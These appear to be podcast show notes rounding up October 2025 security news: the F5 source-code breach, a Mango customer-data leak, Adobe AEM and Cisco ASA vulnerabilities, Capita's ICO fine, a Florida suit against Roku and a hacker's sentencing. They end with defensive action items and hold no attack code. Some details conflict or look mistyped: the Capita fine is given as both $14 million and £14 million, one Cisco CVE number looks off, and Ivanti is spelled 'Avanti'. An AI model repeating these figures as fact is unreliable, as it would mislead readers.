Good Morning Security Gang!
Happy Thursday, October 16th, 2025, and welcome back to the CyberHub Podcast. I’ve got my double shot ready, still piping hot, and we’ve got a massive show today.
F5 has confirmed a major nation-state breach that exposed Big-IP source code and internal vulnerabilities, Mango has disclosed a customer data leak through a marketing partner, and the UK’s ICO just fined Capita $14 million after a catastrophic breach that impacted over 6.6 million people.
Plus, we’ve got fresh vulnerabilities across Adobe, Fortinet, Avanti, Siemens, and Cisco — and even some good old-fashioned legal action out of Florida and Massachusetts showing that accountability is finally catching up with cybercrime.
Buckle up, Security Gang — this one’s loaded. ☕
🧱 F5 Breach Exposes Source Code in Nation-State Attack
We kick off with a major cybersecurity breach at F5 Networks, the makers of Big-IP, after attackers maintained long-term persistence inside the company’s engineering systems and exfiltrated source code and undisclosed vulnerability data.
The breach — confirmed by F5 and attributed to China’s UNC5221 (aka “Brickstorm”) — gave the attackers insight into Big-IP logic flaws and zero-days, potentially enabling follow-on exploitation. F5 says there’s no evidence of supply-chain compromise or current RCE exploitation but has rotated signing keys, patched dozens of Big-IP vulnerabilities, and is accelerating internal security reviews.
CISA and the UK’s NCSC issued joint alerts, warning that access to F5’s source code provides attackers a “head start” on weaponizing flaws before vendors can patch them.
I said it bluntly on the show:
“This is SolarWinds all over again — except this time it’s on the security side of the house.”
F5’s investigation involves Mandiant, CrowdStrike, and Google TAG, all confirming the attack’s connection to Chinese state interests. The U.S. and UK governments are bracing for potential Big-IP scanning surges and exploitation attempts over the next 90 days.
My advice:
Treat every Big-IP system as mission critical.
Audit logs for lateral movement and exfiltration indicators.
Patch, harden, and enable deep monitoring immediately.
👗 Mango Confirms Customer Data Leak via Marketing Partner
Spanish fashion retailer Mango is notifying customers about a data breach involving a compromised marketing service provider. Exposed data includes first names, country, postal code, email addresses, and phone numbers — though Mango confirmed no payment data or passwords were compromised.
The brand, headquartered in Barcelona, operates in over 120 countries, and this breach could lead to phishing or smishing attacks against loyalty members and newsletter subscribers.
I told listeners, “Expect a wave of fake Mango promo codes, discounts, and look-alike emails — especially targeting users in Europe.”
If you or your organization partners with Mango, now’s the time to tighten DMARC and SPF, and prepare for potential supply-chain phishing.
💻 Adobe AEM Zero-Day Added to KEV
Yesterday, CISA added Adobe CVE-2025-54253 to the Known Exploited Vulnerabilities (KEV) catalog — confirming active exploitation in the wild.
This critical bug affects Adobe Experience Manager (AEM) Forms 6.5.13 stream, enabling unauthorized code execution via public form portals. Threat actors are reportedly using this to deploy web shells, data-theft payloads, and ransomware stagers.
Adobe released a fix earlier this week, but exploitation began shortly thereafter.
“If you’re running AEM, assume compromise and start hunting child Java processes — this is the new SharePoint moment,” I warned.
🧠 Fortinet, Avanti, and ICS Vendors Push Emergency Fixes
Fortinet and Avanti are both in rapid patch mode, releasing 30+ advisories each to address high-severity flaws:
FortiDLP and FortiClient Mac: Command execution and authorization bypasses.
Avanti EPMM and Neurons MDM: MFA bypass and arbitrary enrollment flaws.
While no active exploitation is confirmed yet, these are high-value targets for Chinese and Russian operators — particularly in light of F5’s recent breach.
Meanwhile, Siemens, Schneider Electric, ABB, Rockwell, and Phoenix Contact all released over 20 new ICS advisories, including unauthorized control operations, DoS, and credential exposure risks. Rockwell’s 1783 NATR router vulnerability was rated critical due to admin takeover and NAT rule tampering.
🧱 Cisco Faces Senate Scrutiny Over ASA Flaws
U.S. Senator Bill Cassidy has demanded an explanation from Cisco CEO Chuck Robbins regarding two critical ASA vulnerabilities — CVE-2025-30333 and CVE-2025-20362 — after reports emerged that at least one federal agency was breached via Cisco infrastructure.
Cassidy, who chairs the Senate Committee on Health, Education, Labor, and Pensions, cited inadequate vendor communication and delayed mitigation guidance.
While Cisco has issued emergency patches, both Canada and the UK’s NCSC have also issued threat alerts tied to the same CVEs.
This is another wake-up call for vendors: “Ship secure code, or Washington will make you.”
💾 Capita Fined $14M for Data Breach Impacting 6.6 Million People
The UK’s Information Commissioner’s Office (ICO) fined Capita £14 million ($18.7 million USD) for its mishandling of a 2023 ransomware breach that compromised 6.6 million individuals’ data, including retirement records and personal identifiers.
Originally facing a £45 million fine, Capita’s penalty was reduced due to its remediation efforts — though the ICO criticized the company for taking 58 hours to isolate infected systems, enabling extensive lateral movement by the Black Basta ransomware group.
The breach’s victims include hundreds of pension administrators and retirement plan providers.
I said:
“That fine isn’t going to victims — it’s going straight to government coffers. But maybe it’ll finally push companies to isolate faster.”
🧒 Florida Sues Roku for Monetizing Kids’ Data
The Florida Attorney General filed a civil enforcement action against Roku, alleging unlawful monetization of children’s precise geolocation data under the Florida Digital Bill of Rights and the Deceptive and Unfair Trade Practices Act.
This case follows similar actions in Texas and Utah, signaling that state-level data privacy enforcement is accelerating beyond California.
It’s a reminder that regulators are watching how data brokers and streaming platforms track underage users.
👨💻 Massachusetts Cyber Criminal Sentenced to 4 Years in Prison
Finally, Matthew Lane, the Massachusetts hacker behind the PowerSchool breach, has been sentenced to four years in federal prison and ordered to pay $14 million in restitution. Lane hacked multiple educational software systems and extorted companies after stealing data on 70 million students.
He also received three years of supervised release following his sentence. Justice — for once — actually delivered.
🧠 James Azar’s CISO Take
Today’s stories underscore a growing reality: our defensive tools are becoming offensive weapons. The F5 breach is a critical reminder that when adversaries compromise the defenders, they inherit blueprints for global exploitation. Just like SolarWinds and Microsoft in 2021, this F5 incident will have long-tail consequences. Chinese operators will be racing the patch clock to weaponize what they stole — which means defenders have to move faster than ever before.
At the same time, stories like Capita, Mango, and Roku prove that governance, accountability, and vendor hygiene are just as vital as patching. We’re not just securing networks anymore — we’re managing ecosystems of trust. CISOs must keep driving the message up the chain: cyber risk is business risk. It’s not about fear; it’s about readiness.
✅ Action Items
🧱 Audit and patch all F5 Big-IP systems; enable anomaly detection and segmentation.
👗 Prepare for phishing campaigns using Mango breach data; validate marketing provider access.
💻 Apply Adobe AEM (CVE-2025-54253) patch immediately; monitor for child Java processes.
⚙ Patch Fortinet, Avanti, and ICS advisories; review VPN and OT segmentation.
🧱 Validate Cisco ASA patch status (CVE-2025-30333 / 20362).
💾 Review breach isolation policies and recovery SLAs; use Capita as a tabletop case.
🧒 Audit your organization’s data broker and tracking compliance under new state laws.
👨💻 Educate staff on phishing and data extortion trends tied to breach fallout.
And that’s a wrap for today’s show, Security Gang — patch smart, stay resilient, and as always, stay cyber safe! ☕👊
